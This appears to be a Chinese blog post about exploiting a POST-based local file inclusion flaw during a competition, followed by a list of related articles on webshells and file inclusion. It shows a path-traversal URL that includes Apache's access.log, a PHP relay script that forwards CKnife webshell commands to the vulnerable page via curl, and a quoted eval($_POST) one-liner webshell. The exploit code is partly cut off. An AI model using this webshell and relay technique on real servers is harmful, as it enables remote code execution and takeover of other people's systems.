php post 漏洞,POST型文件包含漏洞之一句话利用

最新推荐文章于 2024-07-23 02:55:27 发布
最新推荐文章于 2024-07-23 02:55:27 发布
阅读量878 收藏
点赞数
文章标签: php post 漏洞
本文介绍了一种针对文件包含漏洞的解决办法,当GET方式无法利用时,通过POST请求来绕过限制。作者利用PHP编写了一个脚本,通过POST参数传递数据,实现了CKnife的连接,并在Apache access.log文件中写入数据。此方法适用于PHP文件管理的中转处理,但可能不适用于所有文件管理功能。
摘要由CSDN通过智能技术生成

最近在忙比赛,碰到了一个文件包含漏洞,通过包含apache的access.log中的一句话,使用CKnife进行连接,但是Get型是十分轻松的,直接 http://xxx/FilesIn.php?filename=../apache/logs/access.log 进行包含利用就行了。但是当遇到这样的文件保护漏洞。

上面的办法是完全没有效果的,本身菜刀,C刀的配置参数中也不支持POST选项,所以这好好的漏洞岂不是浪费了?通过之前的Cookies注入中的Cookies中转注入思想,写了一个简易的脚本(以C刀为例)。

首先我们先给日志写入一句话。

然后我们可以在靶机上查看一下是否上传成功。

ok

创建如下脚本:

'../Apache/logs/access.log');if(isset($_POST["CRoot"]))//此处CRoot改为你的密码{ $tmp = array('CRoot'=>$_POST["CRoot"]);//此处CRoot改为你的密码 $data += $tmp;}if(isset($_POST["action"])){ $tmp = array('action'=>$_POST["action"]); $data += $tmp;}if(isset($_POST['z1'])){ $tmp = array('z1'=>$_POST["z1"]); $data += $tmp;}//$data = array('filename'=>'../Apache/logs/access.log','CRoot'=>$postdata,'action'=$_POST["action"],'z1'=$_POST['z1']);//var_dump($data);$data = http_build_query($data);$curl = curl_init();curl_setopt($curl,CURLOPT_URL,$url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_POST, 1);curl_setopt($curl, CURLOPT_POSTFIELDS, $data);$rtdata = curl_exec($curl);curl_close($curl);echo $rtdata;?>

打开C刀

本地搭建PHP服务器进行连接。测试效果

OK.本次仅仅对PHP类型的文件管理进行了中转处理,其他管理功能可能支持的不大好。

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

悦悦说
关注
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1111
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞PHP中一种典的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
php一句话木马连菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1954
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
文件包含漏洞
qwzf
08-21 1277
0前言 因为之前做过文件包含漏洞的Web题,了解了一点文件包含漏洞的一些知识,但并没有总结。所以现在重新学习并总结了一下文件包含漏洞文件包含漏洞简介 什么是文件包含 为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 文件包含的原理 PHP中提供了四个文件包含的函数,分别是include()、include_once()、require...
phpweb的post.php文件破解并修复万能密码漏洞
02-02
phpweb的post.php文件,已经解密了zend,并且修复了后台万能密码的漏洞
SQL注入漏洞测试(post
最新发布
Jz031212的博客
07-23 165
name=1’union select 1,2,3 #可以成功登录。输入账号为1,密码为1进行登录。
PHP FirstPost存在路径泄露漏洞
weixin_33772645的博客
06-13 111
  受影响系统:   PHP FirstPost PHP FirstPost 0.1   描述:   BUGTRAQ ID: 4274   CVE(CAN) ID: CVE-2002-0445   PHP FirstPost是一款PHP WEB日志程序,包含一个开放的提议队列和评估系统。   PHP FirstPost对不存在的页面请求处理不正确,可导致www...
php post 漏洞_本地文件包含漏洞
weixin_39658318的博客
11-21 443
实验环境:1、虚机win7 192.168.64.1542、Kali 192.168.64.148 3、Phpstudy php-5.4.45文件包含漏洞原理:文件包含漏洞由于程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。由于代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,往往这...
php post 漏洞_PHP漏洞小计
weixin_39670849的博客
11-21 518
一、 前言介绍随着Web端在互联网行业的普遍的应用,关注Web端安全对于各行业来说已到了不再推脱和避免的形势,然而表现上的安全问题,都是通过代码层去解决的,所以代码审计能解决表面上发现不了的安全问题,从而更好的为用户提供服务。二、 相关漏洞及代码2.1SQL注入2.1.1介绍SQL注入是在程序设计时忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到...
文件包含
j7ur8
06-10 1567
本文会尽量持续更新以记录文件包含漏洞的各种应用.
上传漏洞-一句话木马
Coisini的博客
05-30 8568
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
文件包含漏洞之日志利用
GHD_Nidhogg的博客
03-13 1243
Apache日志 某php文件存在本地文件包含漏洞,但无法上传文件,此时可以找到Apache路径,利用包含漏洞包含Apache日志文件也可以获取WebShell Apache运行后一般默认会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),Apache的访问日志文件记录了客户端的每次请求及服务器响应的相关信息。 127.0.0.1 - - [0...
PHP 一一 文件包含、GET POST、头像上传功能
Guizy
01-04 710
三、PHP中的文件包含 1、为什么需要文件包含 2、文件包含的步骤 在实际项目开发中,我们通常把项目分为两个公用部分(顶部+底部),然后使用文件包含放入到我们的页面中。 文件包含的基本语法:include与require 3、include与require的区别(重点) include与require对于文件的包含其效果都是一样的。但是两者对于错误的处理不同: ① in
文件上传/文件包含
qq_35533398的博客
09-08 901
文件上传 1、前端验证 如:检测 . 后的后缀名 绕过方式:burp进行抓包修改后缀 2、后端验证 (1)获取文件名,过滤php后缀 绕过方式1:.php4 .php5 .phtml php2, php3, php4, php5, phps, pht, phtm, phtml 绕过方式2:apache解析漏洞,从后向前知道可以识别的后缀,如 aaa.php.lyc (2)对文件MIME类进行判断 比如:if ($_FILES["file"]["type"] != "image/jpeg
Web安全:PHP反序列化漏洞的 测试(向服务器写入一句话.)
网络安全领域___专研者.
05-29 641
程序员在写代码时,没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法.
php post 漏洞_代码审计之php://输入输出流
weixin_39856630的博客
11-21 170
PHP提供了php://的协议允许访问PHP的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。主要提供如下访问方式来使用这些封装器:php使用最多的是phpphp://input其中php://input是可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据,但是php://input不能在获取“multipa...
PHP代码执行漏洞
笑花大王
02-03 417
前言 最近的日子简简单单 早上起来健身+散打来一套 看看电视剧学习学习吃吃饭一天就结束了emmmm太快了一天 所以要更加努力!更加勤奋! PHP代码执行漏洞 有的应用程序中提供了一些可以将字符串作为代码执行的函数,例如PHP中的eval函数,可以将改函数的参数当做PHP代码来执行。如果对这些函数的参数控制不严格,就可能会被攻击者利用,执行恶意代码 1.eval函数 eval函数把...
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 2058
php命令执行基础与CTF例题分析
php post 漏洞_ThinkPHP 5.0命令执行漏洞分析及复现
weixin_39711441的博客
11-19 412
ThinkPHP 5.0 版本是一个颠覆和重构版本,也是ThinkPHP 十周年献礼版本,基于 PHP5.4 设计(完美支持 PHP7 ),采用全新的架构思想,引入了很多的 PHP 新特性,优化了核心,减少了依赖,支持Composer ,实现了真正的惰性加载,并且为 API 开发做了深入的支持,在功能、性能以及灵活性方面都较为突出 。漏洞描述ThinkPHP5.0在核心代码中实现了表单请...
文件上传漏洞一句话木马详解
文件上传漏洞利用中,常用的一种Webshell是一句话木马,例如: ```php <?php@eval($_POST['hack']);?> ``` 这里的`eval()`函数是PHP中的一个关键部分,它接收一个字符串作为参数,并将其作为PHP代码执行。攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值